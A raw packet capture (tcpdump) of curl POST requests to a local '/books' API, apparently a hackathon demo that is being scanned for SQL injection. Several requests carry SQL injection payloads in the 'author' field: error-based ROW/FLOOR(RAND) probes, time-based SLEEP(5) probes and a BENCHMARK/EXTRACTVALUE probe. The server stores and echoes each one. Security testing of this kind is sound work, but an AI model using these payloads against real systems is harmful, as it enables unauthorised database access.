22:16:01.181139 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.55462 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x8a21), seq 4200591987, win 43690, options [mss 65476,sackOK,TS val 9581445 ecr 0,nop,wscale 7], length 0
22:16:01.181172 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.55462: Flags [S.], cksum 0x0030 (incorrect -> 0x0e2d), seq 2640620135, ack 4200591988, win 43690, options [mss 65476,sackOK,TS val 9581445 ecr 9581445,nop,wscale 7], length 0
22:16:01.181194 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55462 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xe05e), seq 1, ack 1, win 342, options [nop,nop,TS val 9581445 ecr 9581445], length 0
22:16:01.181299 IP6 (hlim 64, next-header TCP (6) payload length: 428) ::1.55462 > ::1.8080: Flags [P.], cksum 0x01b4 (incorrect -> 0xfedc), seq 1:397, ack 1, win 342, options [nop,nop,TS val 9581445 ecr 9581445], length 396: HTTP, length: 396
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 260
	
	{"name":"Hackathon-Demo0","author":"RameshAND ROW(4115,7844)>(SELECT COUNT(*),CONCAT(0x717a786271,(SELECT (ELT(4115=4115,1))),0x7176767871,FLOOR(RAND(0)*2))x FROM (SELECT 9757 UNION SELECT 8982 UNION SELECT 5308 UNION SELECT 5233)a GROUP BY x)","price":"9.99"}[!http]
22:16:01.181313 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.55462: Flags [.], cksum 0x0028 (incorrect -> 0xdeca), seq 1, ack 397, win 350, options [nop,nop,TS val 9581445 ecr 9581445], length 0
22:16:01.185701 IP6 (hlim 64, next-header TCP (6) payload length: 434) ::1.8080 > ::1.55462: Flags [P.], cksum 0x01ba (incorrect -> 0x8c53), seq 1:403, ack 397, win 350, options [nop,nop,TS val 9581449 ecr 9581445], length 402: HTTP, length: 402
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 22:16:01 GMT
	
	10b
	{"id":126,"name":"Hackathon-Demo0","author":"RameshAND ROW(4115,7844)>(SELECT COUNT(*),CONCAT(0x717a786271,(SELECT (ELT(4115=4115,1))),0x7176767871,FLOOR(RAND(0)*2))x FROM (SELECT 9757 UNION SELECT 8982 UNION SELECT 5308 UNION SELECT 5233)a GROUP BY x)","price":9.99}
22:16:01.185719 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55462 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xdd30), seq 397, ack 403, win 350, options [nop,nop,TS val 9581449 ecr 9581449], length 0
22:16:01.186080 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.55462: Flags [P.], cksum 0x002d (incorrect -> 0x9908), seq 403:408, ack 397, win 350, options [nop,nop,TS val 9581450 ecr 9581449], length 5: HTTP
22:16:01.186096 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55462 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xdd29), seq 397, ack 408, win 350, options [nop,nop,TS val 9581450 ecr 9581450], length 0
22:16:01.186459 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55462 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0xdd28), seq 397, ack 408, win 350, options [nop,nop,TS val 9581450 ecr 9581450], length 0
22:16:01.187914 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.55462: Flags [F.], cksum 0x0028 (incorrect -> 0xdd25), seq 408, ack 398, win 350, options [nop,nop,TS val 9581452 ecr 9581450], length 0
22:16:01.187933 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55462 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xdd23), seq 398, ack 409, win 350, options [nop,nop,TS val 9581452 ecr 9581452], length 0
22:16:01.197058 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.55464 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0xf2d6), seq 3742016769, win 43690, options [mss 65476,sackOK,TS val 9581461 ecr 0,nop,wscale 7], length 0
22:16:01.197080 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.55464: Flags [S.], cksum 0x0030 (incorrect -> 0x19af), seq 963734398, ack 3742016770, win 43690, options [mss 65476,sackOK,TS val 9581461 ecr 9581461,nop,wscale 7], length 0
22:16:01.197099 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55464 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xebe0), seq 1, ack 1, win 342, options [nop,nop,TS val 9581461 ecr 9581461], length 0
22:16:01.197186 IP6 (hlim 64, next-header TCP (6) payload length: 228) ::1.55464 > ::1.8080: Flags [P.], cksum 0x00ec (incorrect -> 0xef8d), seq 1:197, ack 1, win 342, options [nop,nop,TS val 9581461 ecr 9581461], length 196: HTTP, length: 196
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 61
	
	{"name":"Hackathon-Demo1","author":"Ramesh-P","price":"9.99"}[!http]
22:16:01.197199 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.55464: Flags [.], cksum 0x0028 (incorrect -> 0xeb14), seq 1, ack 197, win 350, options [nop,nop,TS val 9581461 ecr 9581461], length 0
22:16:01.199859 IP6 (hlim 64, next-header TCP (6) payload length: 234) ::1.8080 > ::1.55464: Flags [P.], cksum 0x00f2 (incorrect -> 0x0471), seq 1:203, ack 197, win 350, options [nop,nop,TS val 9581463 ecr 9581461], length 202: HTTP, length: 202
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 22:16:01 GMT
	
	44
	{"id":127,"name":"Hackathon-Demo1","author":"Ramesh-P","price":9.99}
22:16:01.199879 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55464 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xea45), seq 197, ack 203, win 350, options [nop,nop,TS val 9581464 ecr 9581463], length 0
22:16:01.200099 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.55464: Flags [P.], cksum 0x002d (incorrect -> 0xa61d), seq 203:208, ack 197, win 350, options [nop,nop,TS val 9581464 ecr 9581464], length 5: HTTP
22:16:01.200116 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55464 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xea3f), seq 197, ack 208, win 350, options [nop,nop,TS val 9581464 ecr 9581464], length 0
22:16:01.200495 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55464 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0xea3e), seq 197, ack 208, win 350, options [nop,nop,TS val 9581464 ecr 9581464], length 0
22:16:01.201021 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.55464: Flags [F.], cksum 0x0028 (incorrect -> 0xea3c), seq 208, ack 198, win 350, options [nop,nop,TS val 9581465 ecr 9581464], length 0
22:16:01.201044 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55464 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xea3b), seq 198, ack 209, win 350, options [nop,nop,TS val 9581465 ecr 9581465], length 0
22:16:01.210476 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.55466 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x6e67), seq 3476568372, win 43690, options [mss 65476,sackOK,TS val 9581474 ecr 0,nop,wscale 7], length 0
22:16:01.210505 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.55466: Flags [S.], cksum 0x0030 (incorrect -> 0x8709), seq 64466753, ack 3476568373, win 43690, options [mss 65476,sackOK,TS val 9581474 ecr 9581474,nop,wscale 7], length 0
22:16:01.210524 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55466 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x593b), seq 1, ack 1, win 342, options [nop,nop,TS val 9581474 ecr 9581474], length 0
22:16:01.210621 IP6 (hlim 64, next-header TCP (6) payload length: 239) ::1.55466 > ::1.8080: Flags [P.], cksum 0x00f7 (incorrect -> 0xfea0), seq 1:208, ack 1, win 342, options [nop,nop,TS val 9581474 ecr 9581474], length 207: HTTP, length: 207
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 72
	
	{"name":"Hackathon-Demo2","author":"Ramesh AND SLEEP(5)","price":"9.99"}[!http]
22:16:01.210638 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.55466: Flags [.], cksum 0x0028 (incorrect -> 0x5864), seq 1, ack 208, win 350, options [nop,nop,TS val 9581474 ecr 9581474], length 0
22:16:01.212508 IP6 (hlim 64, next-header TCP (6) payload length: 245) ::1.8080 > ::1.55466: Flags [P.], cksum 0x00fd (incorrect -> 0x005b), seq 1:214, ack 208, win 350, options [nop,nop,TS val 9581476 ecr 9581474], length 213: HTTP, length: 213
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 22:16:01 GMT
	
	4f
	{"id":128,"name":"Hackathon-Demo2","author":"Ramesh AND SLEEP(5)","price":9.99}
22:16:01.212522 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55466 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x578b), seq 208, ack 214, win 350, options [nop,nop,TS val 9581476 ecr 9581476], length 0
22:16:01.212751 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.55466: Flags [P.], cksum 0x002d (incorrect -> 0x1364), seq 214:219, ack 208, win 350, options [nop,nop,TS val 9581476 ecr 9581476], length 5: HTTP
22:16:01.212762 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55466 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x5786), seq 208, ack 219, win 350, options [nop,nop,TS val 9581476 ecr 9581476], length 0
22:16:01.212883 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55466 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0x5784), seq 208, ack 219, win 350, options [nop,nop,TS val 9581477 ecr 9581476], length 0
22:16:01.213022 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.55466: Flags [F.], cksum 0x0028 (incorrect -> 0x5782), seq 219, ack 209, win 350, options [nop,nop,TS val 9581477 ecr 9581477], length 0
22:16:01.213064 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55466 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x5782), seq 209, ack 220, win 350, options [nop,nop,TS val 9581477 ecr 9581477], length 0
22:16:01.222755 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.55468 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x3886), seq 4256514186, win 43690, options [mss 65476,sackOK,TS val 9581486 ecr 0,nop,wscale 7], length 0
22:16:01.222800 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.55468: Flags [S.], cksum 0x0030 (incorrect -> 0xad65), seq 4147601303, ack 4256514187, win 43690, options [mss 65476,sackOK,TS val 9581486 ecr 9581486,nop,wscale 7], length 0
22:16:01.222853 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55468 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x7f97), seq 1, ack 1, win 342, options [nop,nop,TS val 9581486 ecr 9581486], length 0
22:16:01.222972 IP6 (hlim 64, next-header TCP (6) payload length: 228) ::1.55468 > ::1.8080: Flags [P.], cksum 0x00ec (incorrect -> 0x8143), seq 1:197, ack 1, win 342, options [nop,nop,TS val 9581487 ecr 9581486], length 196: HTTP, length: 196
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 61
	
	{"name":"Hackathon-Demo3","author":"Ramesh-P","price":"9.99"}[!http]
22:16:01.222989 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.55468: Flags [.], cksum 0x0028 (incorrect -> 0x7ec9), seq 1, ack 197, win 350, options [nop,nop,TS val 9581487 ecr 9581487], length 0
22:16:01.224550 IP6 (hlim 64, next-header TCP (6) payload length: 234) ::1.8080 > ::1.55468: Flags [P.], cksum 0x00f2 (incorrect -> 0x9426), seq 1:203, ack 197, win 350, options [nop,nop,TS val 9581488 ecr 9581487], length 202: HTTP, length: 202
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 22:16:01 GMT
	
	44
	{"id":129,"name":"Hackathon-Demo3","author":"Ramesh-P","price":9.99}
22:16:01.224568 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55468 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x7dfd), seq 197, ack 203, win 350, options [nop,nop,TS val 9581488 ecr 9581488], length 0
22:16:01.224790 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.55468: Flags [P.], cksum 0x002d (incorrect -> 0x39d6), seq 203:208, ack 197, win 350, options [nop,nop,TS val 9581488 ecr 9581488], length 5: HTTP
22:16:01.224806 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55468 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x7df8), seq 197, ack 208, win 350, options [nop,nop,TS val 9581488 ecr 9581488], length 0
22:16:01.224971 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55468 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0x7df6), seq 197, ack 208, win 350, options [nop,nop,TS val 9581489 ecr 9581488], length 0
22:16:01.225109 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.55468: Flags [F.], cksum 0x0028 (incorrect -> 0x7df4), seq 208, ack 198, win 350, options [nop,nop,TS val 9581489 ecr 9581489], length 0
22:16:01.225127 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55468 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x7df4), seq 198, ack 209, win 350, options [nop,nop,TS val 9581489 ecr 9581489], length 0
22:16:01.240989 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.55470 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0xaaf4), seq 3652448776, win 43690, options [mss 65476,sackOK,TS val 9581505 ecr 0,nop,wscale 7], length 0
22:16:01.241013 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.55470: Flags [S.], cksum 0x0030 (incorrect -> 0x113b), seq 928394751, ack 3652448777, win 43690, options [mss 65476,sackOK,TS val 9581505 ecr 9581505,nop,wscale 7], length 0
22:16:01.241031 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55470 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xe36c), seq 1, ack 1, win 342, options [nop,nop,TS val 9581505 ecr 9581505], length 0
22:16:01.241114 IP6 (hlim 64, next-header TCP (6) payload length: 240) ::1.55470 > ::1.8080: Flags [P.], cksum 0x00f8 (incorrect -> 0x6bc8), seq 1:209, ack 1, win 342, options [nop,nop,TS val 9581505 ecr 9581505], length 208: HTTP, length: 208
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 73
	
	{"name":"Hackathon-Demo4","author":"Ramesh AND SLEEP(5)#","price":"9.99"}[!http]
22:16:01.241127 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.55470: Flags [.], cksum 0x0028 (incorrect -> 0xe294), seq 1, ack 209, win 350, options [nop,nop,TS val 9581505 ecr 9581505], length 0
22:16:01.250118 IP6 (hlim 64, next-header TCP (6) payload length: 246) ::1.8080 > ::1.55470: Flags [P.], cksum 0x00fe (incorrect -> 0x889c), seq 1:215, ack 209, win 350, options [nop,nop,TS val 9581514 ecr 9581505], length 214: HTTP, length: 214
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 22:16:01 GMT
	
	50
	{"id":130,"name":"Hackathon-Demo4","author":"Ramesh AND SLEEP(5)#","price":9.99}
22:16:01.250135 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55470 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xe1ac), seq 209, ack 215, win 350, options [nop,nop,TS val 9581514 ecr 9581514], length 0
22:16:01.250402 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.55470: Flags [P.], cksum 0x002d (incorrect -> 0x9d85), seq 215:220, ack 209, win 350, options [nop,nop,TS val 9581514 ecr 9581514], length 5: HTTP
22:16:01.250418 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55470 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xe1a7), seq 209, ack 220, win 350, options [nop,nop,TS val 9581514 ecr 9581514], length 0
22:16:01.250681 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55470 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0xe1a6), seq 209, ack 220, win 350, options [nop,nop,TS val 9581514 ecr 9581514], length 0
22:16:01.251412 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.55470: Flags [F.], cksum 0x0028 (incorrect -> 0xe1a4), seq 220, ack 210, win 350, options [nop,nop,TS val 9581515 ecr 9581514], length 0
22:16:01.251441 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55470 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xe1a3), seq 210, ack 221, win 350, options [nop,nop,TS val 9581515 ecr 9581515], length 0
22:16:01.262186 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.55472 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0xe6b4), seq 4255027782, win 43690, options [mss 65476,sackOK,TS val 9581526 ecr 0,nop,wscale 7], length 0
22:16:01.262233 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.55472: Flags [S.], cksum 0x0030 (incorrect -> 0xb65b), seq 3255712209, ack 4255027783, win 43690, options [mss 65476,sackOK,TS val 9581526 ecr 9581526,nop,wscale 7], length 0
22:16:01.262271 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55472 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x888d), seq 1, ack 1, win 342, options [nop,nop,TS val 9581526 ecr 9581526], length 0
22:16:01.262384 IP6 (hlim 64, next-header TCP (6) payload length: 228) ::1.55472 > ::1.8080: Flags [P.], cksum 0x00ec (incorrect -> 0x883a), seq 1:197, ack 1, win 342, options [nop,nop,TS val 9581526 ecr 9581526], length 196: HTTP, length: 196
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 61
	
	{"name":"Hackathon-Demo5","author":"Ramesh-P","price":"9.99"}[!http]
22:16:01.262398 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.55472: Flags [.], cksum 0x0028 (incorrect -> 0x87c1), seq 1, ack 197, win 350, options [nop,nop,TS val 9581526 ecr 9581526], length 0
22:16:01.264261 IP6 (hlim 64, next-header TCP (6) payload length: 234) ::1.8080 > ::1.55472: Flags [P.], cksum 0x00f2 (incorrect -> 0xa31c), seq 1:203, ack 197, win 350, options [nop,nop,TS val 9581528 ecr 9581526], length 202: HTTP, length: 202
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 22:16:01 GMT
	
	44
	{"id":131,"name":"Hackathon-Demo5","author":"Ramesh-P","price":9.99}
22:16:01.264281 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55472 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x86f3), seq 197, ack 203, win 350, options [nop,nop,TS val 9581528 ecr 9581528], length 0
22:16:01.264485 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.55472: Flags [P.], cksum 0x002d (incorrect -> 0x42cc), seq 203:208, ack 197, win 350, options [nop,nop,TS val 9581528 ecr 9581528], length 5: HTTP
22:16:01.264503 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55472 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x86ee), seq 197, ack 208, win 350, options [nop,nop,TS val 9581528 ecr 9581528], length 0
22:16:01.264705 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55472 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0x86ed), seq 197, ack 208, win 350, options [nop,nop,TS val 9581528 ecr 9581528], length 0
22:16:01.264876 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.55472: Flags [F.], cksum 0x0028 (incorrect -> 0x86eb), seq 208, ack 198, win 350, options [nop,nop,TS val 9581529 ecr 9581528], length 0
22:16:01.264894 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55472 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x86ea), seq 198, ack 209, win 350, options [nop,nop,TS val 9581529 ecr 9581529], length 0
22:16:01.274485 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.55474 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x2a51), seq 3965607900, win 43690, options [mss 65476,sackOK,TS val 9581538 ecr 0,nop,wscale 7], length 0
22:16:01.274509 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.55474: Flags [S.], cksum 0x0030 (incorrect -> 0x718b), seq 2848447096, ack 3965607901, win 43690, options [mss 65476,sackOK,TS val 9581538 ecr 9581538,nop,wscale 7], length 0
22:16:01.274536 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55474 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x43bd), seq 1, ack 1, win 342, options [nop,nop,TS val 9581538 ecr 9581538], length 0
22:16:01.274633 IP6 (hlim 64, next-header TCP (6) payload length: 317) ::1.55474 > ::1.8080: Flags [P.], cksum 0x0145 (incorrect -> 0x3ad8), seq 1:286, ack 1, win 342, options [nop,nop,TS val 9581538 ecr 9581538], length 285: HTTP, length: 285
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 149
	
	{"name":"Hackathon-Demo6","author":"Ramesh PROCEDURE ANALYSE(EXTRACTVALUE(3695,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x50477a4b))))),1)","price":"9.99"}[!http]
22:16:01.274648 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.55474: Flags [.], cksum 0x0028 (incorrect -> 0x4298), seq 1, ack 286, win 350, options [nop,nop,TS val 9581538 ecr 9581538], length 0
22:16:01.276579 IP6 (hlim 64, next-header TCP (6) payload length: 322) ::1.8080 > ::1.55474: Flags [P.], cksum 0x014a (incorrect -> 0xe9cf), seq 1:291, ack 286, win 350, options [nop,nop,TS val 9581540 ecr 9581538], length 290: HTTP, length: 290
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 22:16:01 GMT
	
	9c
	{"id":132,"name":"Hackathon-Demo6","author":"Ramesh PROCEDURE ANALYSE(EXTRACTVALUE(3695,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x50477a4b))))),1)","price":9.99}
22:16:01.276595 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55474 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x4172), seq 286, ack 291, win 350, options [nop,nop,TS val 9581540 ecr 9581540], length 0
22:16:01.277273 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.55474: Flags [P.], cksum 0x002d (incorrect -> 0xfd49), seq 291:296, ack 286, win 350, options [nop,nop,TS val 9581541 ecr 9581540], length 5: HTTP
22:16:01.277289 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55474 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x416b), seq 286, ack 296, win 350, options [nop,nop,TS val 9581541 ecr 9581541], length 0
22:16:01.293306 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55474 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0x415a), seq 286, ack 296, win 350, options [nop,nop,TS val 9581557 ecr 9581541], length 0
22:16:01.293551 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.55474: Flags [F.], cksum 0x0028 (incorrect -> 0x4149), seq 296, ack 287, win 350, options [nop,nop,TS val 9581557 ecr 9581557], length 0
22:16:01.293575 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55474 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x4149), seq 287, ack 297, win 350, options [nop,nop,TS val 9581557 ecr 9581557], length 0
22:16:01.302751 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.55476 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x2b83), seq 469053174, win 43690, options [mss 65476,sackOK,TS val 9581566 ecr 0,nop,wscale 7], length 0
22:16:01.302808 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.55476: Flags [S.], cksum 0x0030 (incorrect -> 0xc036), seq 1271786205, ack 469053175, win 43690, options [mss 65476,sackOK,TS val 9581566 ecr 9581566,nop,wscale 7], length 0
22:16:01.302864 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55476 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x9268), seq 1, ack 1, win 342, options [nop,nop,TS val 9581566 ecr 9581566], length 0
22:16:01.303006 IP6 (hlim 64, next-header TCP (6) payload length: 228) ::1.55476 > ::1.8080: Flags [P.], cksum 0x00ec (incorrect -> 0x9014), seq 1:197, ack 1, win 342, options [nop,nop,TS val 9581567 ecr 9581566], length 196: HTTP, length: 196
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 61
	
	{"name":"Hackathon-Demo7","author":"Ramesh-P","price":"9.99"}[!http]
22:16:01.303028 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.55476: Flags [.], cksum 0x0028 (incorrect -> 0x919a), seq 1, ack 197, win 350, options [nop,nop,TS val 9581567 ecr 9581567], length 0
22:16:01.305715 IP6 (hlim 64, next-header TCP (6) payload length: 234) ::1.8080 > ::1.55476: Flags [P.], cksum 0x00f2 (incorrect -> 0xa8f5), seq 1:203, ack 197, win 350, options [nop,nop,TS val 9581569 ecr 9581567], length 202: HTTP, length: 202
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 22:16:01 GMT
	
	44
	{"id":133,"name":"Hackathon-Demo7","author":"Ramesh-P","price":9.99}
22:16:01.305732 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55476 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x90cc), seq 197, ack 203, win 350, options [nop,nop,TS val 9581569 ecr 9581569], length 0
22:16:01.305983 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.55476: Flags [P.], cksum 0x002d (incorrect -> 0x4ca4), seq 203:208, ack 197, win 350, options [nop,nop,TS val 9581570 ecr 9581569], length 5: HTTP
22:16:01.305995 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55476 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x90c5), seq 197, ack 208, win 350, options [nop,nop,TS val 9581570 ecr 9581570], length 0
22:16:01.306096 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55476 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0x90c4), seq 197, ack 208, win 350, options [nop,nop,TS val 9581570 ecr 9581570], length 0
22:16:01.307679 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.55476: Flags [F.], cksum 0x0028 (incorrect -> 0x90c2), seq 208, ack 198, win 350, options [nop,nop,TS val 9581571 ecr 9581570], length 0
22:16:01.307696 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55476 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0x90c1), seq 198, ack 209, win 350, options [nop,nop,TS val 9581571 ecr 9581571], length 0
22:16:01.316541 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.55478 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0xba66), seq 342665099, win 43690, options [mss 65476,sackOK,TS val 9581580 ecr 0,nop,wscale 7], length 0
22:16:01.316593 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.55478: Flags [S.], cksum 0x0030 (incorrect -> 0xe71c), seq 2249726082, ack 342665100, win 43690, options [mss 65476,sackOK,TS val 9581580 ecr 9581580,nop,wscale 7], length 0
22:16:01.316635 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.55478 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xb94e), seq 1, ack 1, win 342, options [nop,nop,TS val 9581580 ecr 9581580], length 0
